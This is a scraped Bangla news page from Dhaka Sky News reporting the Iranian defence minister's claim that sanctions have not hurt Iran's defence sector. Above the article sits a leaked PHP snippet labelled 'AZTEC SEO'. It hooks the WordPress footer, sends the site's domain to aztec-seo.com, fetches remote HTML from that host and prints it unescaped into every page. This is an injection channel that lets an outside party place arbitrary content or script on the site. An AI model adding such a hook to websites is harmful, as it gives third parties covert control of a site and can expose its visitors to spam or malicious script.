/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); প্রতিরক্ষা খাতে নিষেধাজ্ঞার কোনো প্রভাব পড়েনি: ইরানের প্রতিরক্ষামন্ত্রী | Dhaka Sky News

কৃষ্ণ সাগরে যুদ্ধজাহাজ পাঠিয়ে আমেরিকা-ব্রিটেন ভাগ্য পরীক্ষা করছে: রাশিয়া

আগের সংবাদ

ইসরাইলের নতুন প্রধানমন্ত্রীও ভূমিখেকো: হামাস

পরের সংবাদ

প্রতিরক্ষা খাতে নিষেধাজ্ঞার কোনো প্রভাব পড়েনি: ইরানের প্রতিরক্ষামন্ত্রী

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: June 26, 2021 , 9:26 pm

ইসলামী প্রজাতন্ত্র ইরানের প্রতিরক্ষা খাতে নিষেধাজ্ঞার কোনো প্রভাব পড়েনি। এ কথা বলেছেন প্রতিরক্ষামন্ত্রী ব্রিগেডিয়ার জেনারেল আমির হাতামি।

তিনি আরও বলেছেন, ইরান বিপ্লবের প্রথম থেকেই নিষেধাজ্ঞার মধ্যে ছিল, কিন্তু প্রতিরক্ষা ক্ষেত্রে উন্নয়নের ওপর এর কোনো প্রভাব পড়েনি। ইরানবিরোধী অস্ত্র নিষেধাজ্ঞা নবায়নের মার্কিন প্রচেষ্টার প্রতিক্রিয়ায় আমির হাতামি বলেন, মার্কিন সরকার চেষ্টা করছে, কিন্তু সফল হবে না।

ইরানের প্রতিরক্ষামন্ত্রী বলেন, আমেরিকা ইরানের বিরুদ্ধে অস্ত্র নিষেধাজ্ঞা নবায়নের যে চেষ্টা করছে তা বিদ্বেষমূলক ও অসংযত। এ কারণে বিশ্বের অন্যান্য দেশ এই আহ্বানে সাড়া দেবে না।

প্রতিরক্ষামন্ত্রী হাতামি বলেন, সার্বিক পরিস্থিতি বিবেচনায় আমেরিকা জাতিসংঘ নিরাপত্তা পরিষদে ইরানবিরোধী অস্ত্র নিষেধাজ্ঞা নবায়ন করতে পারবে না।

গত অক্টোবরে জাতিসংঘ নিরাপত্তা পরিষদে ইরানের ওপর আরোপিত অস্ত্র নিষেধাজ্ঞার মেয়াদ শেষ হয়ে যায়। মেয়াদ শেষ হওয়ায় স্বয়ংক্রিয়ভাবে অস্ত্র নিষেধাজ্ঞা উঠে গেছে। কিন্তু মার্কিন যুক্তরাষ্ট্র এখনও ঐ অস্ত্র নিষেধাজ্ঞা নবায়নের চেষ্টা করে যাচ্ছে। সূত্র : পার্সটুডে